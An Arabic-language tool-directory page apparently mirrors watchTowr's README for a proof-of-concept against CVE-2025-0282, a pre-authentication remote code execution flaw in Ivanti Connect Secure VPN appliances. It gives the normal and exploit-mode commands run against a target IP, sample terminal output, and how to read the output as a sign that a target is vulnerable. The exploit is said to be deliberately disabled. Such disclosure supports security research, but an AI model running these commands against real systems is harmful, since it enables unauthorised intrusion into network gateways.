Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-0282 — Ivanti Connect Secure IFT تجاوز سعة المكدس في TLS قبل المصادقة RCE (CVE-2025-0282) | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/cve-2025-0282
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubwatchtowrlabs/cve-2025-0282

CVE-2025-0282

Ivanti Connect Secure IFT تجاوز سعة المكدس في TLS قبل المصادقة RCE (CVE-2025-0282)

عرض المستودع
3110منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-0282

ثغرة RCE قبل المصادقة في Ivanti Connect Secure IFT نتيجة تجاوز سعة المكدس في TLS (CVE-2025-0282)

تم تعطيل هذا الاستغلال عمداً بطرق غير بسيطة وسيتطلب جهداً لجعله يعمل كما هو موضح سابقاً في منشور مدونتنا حول تقنية الاستغلال.

لفهم هذه الثغرة، يمكنك الاطلاع على الشرح الفني الخاص بنا.

شرح تفصيلي وتقنيات الاستغلال - Ivanti Connect Secure RCE (CVE-2025-0282)

إثبات المفهوم

يعمل الكود في وضعين:

  1. الوضع العادي
  2. وضع الاستغلال

ابدأ بتشغيل الكود في الوضع "العادي". إذا واجهت مطالبة بإدخال كلمة المرور، فهذا يشير إلى أن الهدف يعمل بشكل صحيح. بعد ذلك، بدّل إلى وضع "الاستغلال". إذا رأيت الرسالة "Failed to complete authentication"، فقد يكون الهدف عرضة للثغرة. لاحظ أن كود الاستغلال يتضمن عناوين وإزاحات مكتوبة بشكل ثابت (hardcoded)، وستحتاج إلى تعديلها لتعمل مع هدفك المعتمد.

النتيجة المتوقعة في الوضع العادي:

root@kitploit:~
MODE=normal ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4  
                 __         .__  ___________                    
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________ 
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|   
              \/          \/     \/                              


        (*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)

          - Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2025-0282]

Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found

Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
    --servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Enter user credentials:
Password:

النتيجة المتوقعة في وضع الاستغلال:

root@kitploit:~
MODE=exploit ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4  
                 __         .__  ___________                    
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________ 
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|   
              \/          \/     \/                              


        (*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)

          - Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2025-0282]

Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found

Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
    --servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Failed to read from TLS/DTLS socket: Error in the pull function.
Failed to complete authentication

 [!] Target might be vulnerable

مؤلفو الاستغلال

تم كتابة هذا الاستغلال بواسطة Sina Kheirkhah (@SinSinology) من watchTowr (@watchtowrcyber)

مرجع

مشروع openconnect الذي بُني عليه هذا الكود

تابع watchTowr Labs

لأحدث الأبحاث الأمنية، تابع فريق watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة